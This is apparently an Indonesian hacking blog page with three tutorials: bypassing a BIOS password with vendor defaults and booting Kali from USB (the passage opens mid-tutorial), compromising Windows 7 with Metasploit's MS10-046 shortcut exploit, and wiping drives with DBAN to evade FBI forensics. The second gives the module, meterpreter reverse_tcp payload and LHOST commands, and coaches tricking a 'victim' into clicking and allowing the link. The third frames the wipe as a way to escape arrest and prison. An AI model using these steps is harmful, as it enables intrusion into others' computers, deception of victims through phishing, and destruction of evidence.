Phoenix (generic): 5 decimal digits Sony: 7-digit serial number
Samsung: 12 hexadecimal digits

Setelah memasukkan kode, kamu akan melihat beberapa kode untuk dicoba.  kamu dapat mengetik ini satu per satu untuk melihat apakah ada yang berfungsi.  Jika kamu mencoba ini di komputer Dell, kamu harus menekan Ctrl dan Enter secara bersamaan untuk mendapatkan kata sandi default agar berfungsi.

Langkah 5 Bypass Authentication & Ubah Urutan Boot

Sekarang setelah kamu memiliki kata sandi BIOS default, kamu dapat mengakses seluruh menu BIOS.  Ini memberi akses penuh ke pengaturan perangkat keras komputer, dan kamu dapat melakukan hampir semua yang kamu inginkan pada saat ini.  Untuk memulai, kamu dapat menonaktifkan kata sandi BIOS, mengatur kata sandi admin baru, atau melakukan hal-hal seperti menerapkan pembaruan firmware.

Dalam hal ini, kamu mungkin tidak perlu melakukan semua ini.  Mencoba mengubah urutan boot harus memberi kamu prompt kata sandi, dan setelah kamu memasukkan kata sandi default, kamu harus dapat mengalihkan urutan boot untuk membuat opsi "USB" terlebih dahulu, seperti yang terlihat di atas pada Langkah 3.

Jika ini tidak berhasil, kamu juga dapat menavigasi ke pengaturan keamanan dan mencoba masuk di sana.  Setelah kamu memasukkan kata sandi default, kamu dapat melanjutkan untuk menonaktifkan atau mengubahnya, memungkinkanmu untuk melanjutkan ke pengaturan urutan boot dan mengubahnya untuk menjalankan USB terlebih dahulu.

Langkah 6bBoot Kali Linux dari USB

Sekarang kamu telah melewati kata sandi BIOS dan mengubah urutan boot, masukkan USB Kali live, dan reboot komputer.  Tempat pertama yang dipilih oleh komputer sekarang adalah port USB tempat sistem melakukan booting, tetapi selanjutnya jika tidak ada sistem yang dapat di-boot dicolokkan ke drive USB, ia hanya akan melanjutkan untuk mem-boot dari hard drive seperti biasa.

Setelah sistem dimulai, kamu akan dibawa ke layar pengaturan Kali.  Di sini, kamu dapat memilih versi Kali mana yang ingin Anda jalankan di sistem.  kamu dapat memilih versi langsung, yang tidak akan menyimpan data apa pun ke disk, atau versi persisten, yang akan memungkinkanmu untuk menyimpan file dan pengaturan ke disk.

Kamu juga dapat memilih untuk menginstal Kali Linux secara permanen ke sistem, yang memungkinkan kamu untuk memilih bagian dari hard disk komputer host dan menginstal Kali Linux ke dalamnya.  Ini dapat mengubah cara komputer melakukan boot, jadi ini bukan opsi.

Setelah kamu memutuskan mana yang akan dijalankan, pilih untuk mulai boot ke sistem.  Setelah kamu melihat permintaan masuk, ketik root sebagai nama pengguna dan toor sebagai kata sandi untuk masuk ke desktop untuk pertama kalinya.  Dan sekarang setelah kamu masuk, kamu bebas untuk menjalankan pembaruan, mengubah kata sandi default, dan mulai menggunakan Kali Linux!

Cara Mengirim File Shortcut Backdoor Ke Windows 7


Setelah munculnya Windows 8 dan 8.1 serta windows 10, Windows 7 kini telah menjadi sistem operasi standar pada desktop / klien.

Meskipun informasi yang paling berharga bagi peretas berada di server, terkadang cara terbaik untuk sampai ke server yang diamankan adalah melalui klien yang rentan di jaringan yang sama serta tidak terlalu memperhatikan mengenai keamanan jaringan dan mudah tertipu pada berbagai aplikasi yang tidak aman.

Pada tutorial ini, aku akan menunjukkan kepada kalen banyak cara untuk menyerang dan mengeksploitasi Windows 7. Aku sudah membuat tutorial tentang pengiriman link jahat  yang dapat digunakan di Internet Explorer 8 pada Windows XP, Vista, Server 2003, Server 2008 dan Windows 7, dan satu lagi tentang cara crash Windows 7 dengan membuat loop tak terbatas.

Microsoft akhirnya mendapatkan pesan bahwa mereka perlu membuat sistem operasi mereka lebih aman dan mereka telah melakukannya. Menyerang sistem operasi mereka kini menjadi semakin sulit. Untungnya, untuk peretas, hal yang sama tidak dapat dikatakan untuk browser mereka, Office Suite, dan aplikasi lain, serta semua aplikasi pihak ketiga yang berada pada sistem klien yang khas dan, kadang-kadang — di server.

Kita akan fokus pada serangan kerentanan di browser dan aplikasi pada Windows 7 untuk mendapatkan akses dan memiliki sistem tersebut dalam serangkaian tutorial "Bagaimana Meretas Windows 7" berikut ini. Dalam tutorial ini, kita akan mengirimkan link berbahaya yang kemudian akan secara otomatis mengirim file backdoor.

Langkah 1 Buka Metasploit

Mari kita mulai dengan membuka Metasploit. Kamu dapat melakukannya dengan menggunakan sistem menu di Kali atau lainnya yang sudah diinstall Metasploit, atau lebih sederhana, mengetik:

msfconsole

Langkah 2 Buat Exploit

Dalam peretasan Windows 7 ini, kita akan menggunakan exploit Microsoft sebagai MS10-045 di dafar Keamanan Microsoft mereka dan mengambil keuntungan dari buffer overflow di shortcut .dll. Mari kita memuatnya dengan mengetik:

    msf > use windows/ms10_046_shortcut_icon_dllloader
 
Langkah 3 Get Info

Sekarang kita telah memuatnya dalam Metasploit, mari kita dapatkan lebih banyak info tentang exploit ini untuk lebih memahami apa yang akan kita lakukan.

    msf> info
 
Seperti yang dapat kita baca di bagian bawah, developer exploit menulis:

"Modul ini mengeksploitasi kerentanan dalam penanganan file Shortcut Windows (.LNK) yang berisi ikon sumber daya yang menunjuk ke DLL berbahaya."

Pada dasarnya, kita akan membuat file pintasan, yang ketika diklik oleh korban, akan memungkinkan eksekusi kode berbahaya kita.

Langkah 4 Mengatur Opsi

Dengan exploit dan cara kerjanya, mari kita tentukan opsi yang diperlukan. Pertama, atur Payload.

    set PAYLOAD windows/meterpreter/reverse_tcp

Sekarang kita perlu mengatur IP sistem kita sebagai LHOST bisa pakai IP Local atau Public sesuai kebutuhan:

    set LHOST 192.168.X.XX
 
Setelah opsi ini disetel, kita cukup mengetik "exploit" untuk execute exploit. Tidak seperti beberapa eksploit jarak jauh kita yang lain, apa yang kita lakukan di sini adalah menghasilkan tautan dan server untuk menghosting tautan itu.


Seperti yang kamu lihat di mana saya telah menyoroti di screenshot di atas, Metasploit telah menghasilkan exploit dan kemudian memulai server untuk menjadi host exploit tersebut. Tugas kita sekarang adalah membuat korban mengklik tautan.

Langkah 5 Kirim Link ke Korban

Kita harus kreatif di sini. Ini adalah bagian rekayasa sosial dari peretasan ini. Dengan satu atau lain cara, kita perlu membujuk korban untuk mengklik tautan kita.

Kita semua telah melihat email-email spam yang mengklaim membantu kita memperoleh sedikit uang dengan bekerja di rumah, menumbuhkan penis kita hingga dan lain sebagainya. Atau, itu bisa saja sesuatu yang terdengar tidak bersalah seperti menonton video kucing yang lucu. Jika kita mengklik salah satu tautan, kita cenderung menjadi korban peretasan seperti ini.

Kamu mungkin berkata "tidak ada yang akan begitu mudah tertipu," tetapi dalam kenyataannya, ada miliaran orang yang begitu mudah tertipu. Beberapa peretasan terbesar dalam sejarah (RSA dan NY Times langsung terlintas dalam pikiran) telah diselesaikan dengan cara ini. Ketika semua dikatakan dan dilakukan, saya percaya bahwa peretas yang mendapatkan akses ke nomor kartu kredit di Target mendapatkan akses mereka di dalam jaringan dengan membuat seorang karyawan yang tidak sadar mengklik tautan seperti ini.

Jadi ... kita memiliki tautan dan korban mengekliknya seperti pada tangkapan layar di bawah.

Sekarang, inilah bagian yang penting dan sulit ...

Korban akan ditunjukan peringatan keamanan. Korban harus "Izinkan" kode untuk berjalan. Banyak, atau mungkin sebagian besar pengguna akan tahu lebih baik daripada "Izinkan," tapi kalau cara kita membujuk mereka bagus maka mereka pasti akan mengijinkannya. Buat tautannya terdengar cukup menarik dan SESEORANG akan mengklik "Izinkan," terutama jika itu berasal dari seseorang yang mereka kenal atau mereka pikir  kenal dan percayai.


Langkah 6 Kirim Exploit dan Payload

Ketika korban mengklik prompt "Izinkan", Metasploit memulai proses membangun koneksi klien / server antara kamu dan korban. Proses ini cukup lambat, jadi bersabarlah. Dalam pengalaman saya, bahkan pada sistem Windows 7 yang tidak di amankan, itu tidak selalu berhasil, jadi semangatlah. Semangat dan kreativitas adalah atribut kunci dari seorang hacker yang sukses.

 
Langkah 7 Berhasil!

Happy hacking

Cara Hapus Hard Drive Untuk Menghindari Data Forensik

Dengan penangkapan massal hacker di Eropa dan Amerika Selatan, pasti akan membuat kalean sebagai peretas merasa dag dig dug.  Pasti banyak pertanyaan mengenai bagaimana cara menghapus data sensitif dari hard drive.  So, aku ingin menjelaskan sedikit tentang forensik data, cara kerjanya, dan langkah-langkah yang dapat kamu ambil agar aman.

Seringkali, seorang hacker akan menghapus file dari komputernya, tetapi itu hanya setengah dari cerita, karena file-file itu masih benar-benar ada.  Dan jika hacker yang ceroboh tidak mengambil langkah untuk memperbaikinya, ketika pintunya ditendang dan FBI mengambil hard disknya, mereka akan dapat melihat semuanya.  

Apa itu Forensik Komputer?  Orang-orang di 'CSI'?

Komputer forensik adalah pengumpulan, pelestarian, analisis, dan penyajian bukti terkait komputer.  Singkatnya, ini membantu menentukan siapa, apa, di mana, dan kapan terkait dengan kejahatan atau pelanggaran berbasis komputer.  Ketika FBI selesai menangkapmu dan memasukkan barang-barang kamu ke peti bukti, mereka akan mengirimkannya ke lab data FBI di Washington, D.C.

Selain itu, penguji akan bekerja untuk mengungkap semua file pada sistem subjek.  Ini termasuk file yang aktif, tidak terlihat, dihapus, tersembunyi, dilindungi kata sandi, dan terenkripsi.  Dalam banyak kasus, informasi dikumpulkan selama investigasi forensik komputer yang biasanya tidak tersedia atau dapat dilihat oleh pengguna komputer rata-rata, seperti fragmen data yang dapat ditemukan di ruang yang dialokasikan untuk file yang ada (dikenal sebagai "ruang kendur").  Keterampilan dan alat khusus diperlukan untuk mendapatkan informasi atau bukti semacam ini.


Seorang ahli dapat memulihkan hampir semua file yang kamu hapus, bersama dengan data lain yang belum ditimpa.  Saat komputer digunakan, sistem operasinya secara konstan menulis data ke hard drive.  Dari waktu ke waktu, OS akan menyimpan data baru pada hard drive dengan menimpa data yang ada pada drive, tetapi tidak lagi diperlukan oleh sistem operasi, mis. File yang dihapus.  Jadi, penggunaan sistem komputer yang sedang berlangsung dapat menghancurkan data yang bisa diekstraksi sebelum ditimpa.

Cara Melindungi Diri 

Sementara menghapus file hanya menandai ruang file sebagai tersedia untuk digunakan kembali, menghapus data menimpa semua ruang data pada perangkat penyimpanan, menggantikan data yang berguna dengan data sampah.  Bergantung pada metode yang digunakan, data yang ditimpa bisa berupa nol (juga dikenal sebagai "zero-fill") atau bisa berupa berbagai pola acak.  Inilah sebabnya mengapa menghapus informasi tidak pernah cukup.  Kamu harus mengambil langkah proaktif untuk memastikan penghapusan selesai.

Kita akan menggunakan boot disk yang bagus bernama DBAN untuk melakukan operasi ini.

Langkah 1 Dapatkan dan Burn DBAN ke CD/FlashDisk

Kamu dapat mengunduh rilis terbaru dari Sourceforge di sini.  Setelah kamu memiliki .ISO, next step adalah burningke CD / FlashDisk kosong.  Masukkan media ke dalam drive kamu dan nyalakan kembali komputer.  Sebagian besar komputer diatur untuk mencoba dan melakukan booting dari drive CD sebelum hard disk.  Jika ini bukan masalahnya, dan komputer kamu tidak bisa boot drive CD, kamu harus masuk ke pengaturan BIOS dan mengubah urutan prioritas boot.

Langkah 2 Boot dan Run!

Setelah CD dimulai, kamu akan melihat layar ini:
Kita hanya perlu menekan enter di sini untuk memulai DBAN dalam mode interaktif.  Menu utama yang ditunjukkan di bawah ini akan menampilkan hard drive kamu untuk dihapus.
Layar berikutnya menunjukkan bahwa DBAN siap untuk mulai berfungsi, metode default adalah penghapusan DoD Short, dan itu akan berfungsi dengan baik untuk kita.
Tekan spasi untuk memilih dan itu akan mulai.  Berhati-hatilah, penghapusan DoD membutuhkan sedikit waktu, terutama pada hard drive yang lebih besar.  Tapi tidak selama hukuman penjara.

Kesimpulan

DBAM adalah alat yang lumayan bagus untuk membersihkan hard drive.  Aku membawa salinannya di tas laptop ketika bepergian dan kamu juga harus melakukan hal yang sama.  Cepat, mudah dan berfungsi lebih baik daripada kebanyakan alat lain yang dapat digunakan.  Hati-hati karena (jelas) tidak mungkin untuk memulihkan kembali jika kamu hapus hard drive yang salah! wkekwkkwk
e
Contact Me

Adress/Street

Kalimantan street, City of Jember Indonesia

Phone number

+(62) 823 3486 3080

Email

ahdeen@bk.ru